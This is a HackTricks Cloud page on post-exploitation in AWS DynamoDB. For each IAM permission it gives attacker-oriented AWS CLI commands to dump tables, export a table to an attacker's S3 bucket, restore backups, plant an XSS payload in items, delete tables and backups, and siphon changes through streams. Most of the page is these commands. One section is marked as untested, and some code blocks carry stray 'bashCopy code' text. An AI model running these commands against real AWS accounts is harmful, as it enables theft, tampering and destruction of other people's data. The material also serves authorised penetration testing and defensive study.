AWS - DynamoDB Post Exploitation

Reading time: 9 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

DynamoDB

For more information check:

AWS - DynamoDB Enum

An attacker with this permissions will be able to get items from tables by the primary key (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (describe-table).

bash

aws dynamodb batch-get-item --request-items file:///tmp/a.json

// With a.json
{
    "ProductCatalog" : { // This is the table name
        "Keys": [
            {
            "Id" : { // Primary keys name
                "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
            }
            }
        ]
    }
}

bash

aws dynamodb batch-get-item \
    --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
    --region <region>

Potential Impact: Indirect privesc by locating sensitive information in the table

`dynamodb:GetItem`

Similar to the previous permissions this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:

json

aws dynamodb get-item --table-name ProductCatalog --key  file:///tmp/a.json

// With a.json
{
"Id" : {
    "N": "205"
}
}

With this permission it's also possible to use the transact-get-items method like:

json

aws dynamodb transact-get-items \
    --transact-items file:///tmp/a.json

// With a.json
[
    {
        "Get": {
            "Key": {
                "Id": {"N": "205"}
            },
            "TableName": "ProductCatalog"
        }
    }
]

Potential Impact: Indirect privesc by locating sensitive information in the table

`dynamodb:Query`

Similar to the previous permissions this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a subset of comparisons, but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.

bash

aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json

 // With a.json
 {
"Id" : {
    "ComparisonOperator":"EQ",
    "AttributeValueList": [ {"N": "205"} ]
    }
}

bash

aws dynamodb query \
    --table-name TargetTable \
    --key-condition-expression "AttributeName = :value" \
    --expression-attribute-values '{":value":{"S":"TargetValue"}}' \
    --region <region>

Potential Impact: Indirect privesc by locating sensitive information in the table

`dynamodb:Scan`

You can use this permission to dump the entire table easily.

bash

aws dynamodb scan --table-name <t_name> #Get data inside the table

Potential Impact: Indirect privesc by locating sensitive information in the table

`dynamodb:PartiQLSelect`

You can use this permission to dump the entire table easily.

bash

aws dynamodb execute-statement \
    --statement "SELECT * FROM ProductCatalog"

This permission also allow to perform batch-execute-statement like:

bash

aws dynamodb batch-execute-statement \
    --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'

but you need to specify the primary key with a value, so it isn't that useful.

Potential Impact: Indirect privesc by locating sensitive information in the table

`dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`

This permission will allow an attacker to export the whole table to a S3 bucket of his election:

bash

aws dynamodb export-table-to-point-in-time \
    --table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
    --s3-bucket <attacker_s3_bucket> \
    --s3-prefix <optional_prefix> \
    --export-time <point_in_time> \
    --region <region>

Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:

bash

aws dynamodb describe-continuous-backups \
  --table-name <tablename>

If it isn't enabled, you will need to enable it and for that you need the dynamodb:ExportTableToPointInTime permission:

bash

aws dynamodb update-continuous-backups \
    --table-name <value> \
    --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true

Potential Impact: Indirect privesc by locating sensitive information in the table

`dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`

With these permissions, an attacker would be able to create a new table from a backup (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check information from the backups that could not be any more in the production table.

bash

aws dynamodb restore-table-from-backup \
    --backup-arn <source-backup-arn> \
    --target-table-name <new-table-name> \
    --region <region>

Potential Impact: Indirect privesc by locating sensitive information in the table backup

`dynamodb:PutItem`

This permission allows users to add a new item to the table or replace an existing item with a new item. If an item with the same primary key already exists, the entire item will be replaced with the new item. If the primary key does not exist, a new item with the specified primary key will be created.

bash

## Create new item with XSS payload
aws dynamodb put-item --table <table_name> --item file://add.json
### With add.json:
{
   "Id": {
      "S": "1000"
   },
   "Name": {
      "S":  "Marc"
   },
   "Description": {
       "S": "<script>alert(1)</script>"
   }
}

bash

aws dynamodb put-item \
    --table-name ExampleTable \
    --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
    --region <region>

Potential Impact: Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table

`dynamodb:UpdateItem`

This permission allows users to modify the existing attributes of an item or add new attributes to an item. It does not replace the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will create a new item with the specified primary key and set the attributes specified in the update expression.

bash

## Update item with XSS payload
aws dynamodb update-item --table <table_name> \
    --key file://key.json --update-expression "SET Description = :value" \
    --expression-attribute-values file://val.json
### With key.json:
{
    "Id": {
        "S": "1000"
    }
}
### and val.json
{
    ":value": {
        "S": "<script>alert(1)</script>"
    }
}

bash

aws dynamodb update-item \
    --table-name ExampleTable \
    --key '{"Id": {"S": "1"}}' \
    --update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
    --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
    --region <region>

Potential Impact: Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table

`dynamodb:DeleteTable`

An attacker with this permission can delete a DynamoDB table, causing data loss.

bash

aws dynamodb delete-table \
    --table-name TargetTable \
    --region <region>

Potential impact: Data loss and disruption of services relying on the deleted table.

`dynamodb:DeleteBackup`

An attacker with this permission can delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario.

bash

aws dynamodb delete-backup \
    --backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
    --region <region>

Potential impact: Data loss and inability to recover from a backup during a disaster recovery scenario.

`dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords`

note

TODO: Test if this actually works

An attacker with these permissions can enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage.

Enable a stream on a DynamoDB table:

bash

bashCopy codeaws dynamodb update-table \
    --table-name TargetTable \
    --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
    --region <region>

Describe the stream to obtain the ARN and other details:

bash

bashCopy codeaws dynamodb describe-stream \
    --table-name TargetTable \
    --region <region>

Get the shard iterator using the stream ARN:

bash

bashCopy codeaws dynamodbstreams get-shard-iterator \
    --stream-arn <stream_arn> \
    --shard-id <shard_id> \
    --shard-iterator-type LATEST \
    --region <region>

Use the shard iterator to access and exfiltrate data from the stream:

bash

bashCopy codeaws dynamodbstreams get-records \
    --shard-iterator <shard_iterator> \
    --region <region>

Potential impact: Real-time monitoring and data leakage of the DynamoDB table's changes.

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

HackTricks Cloud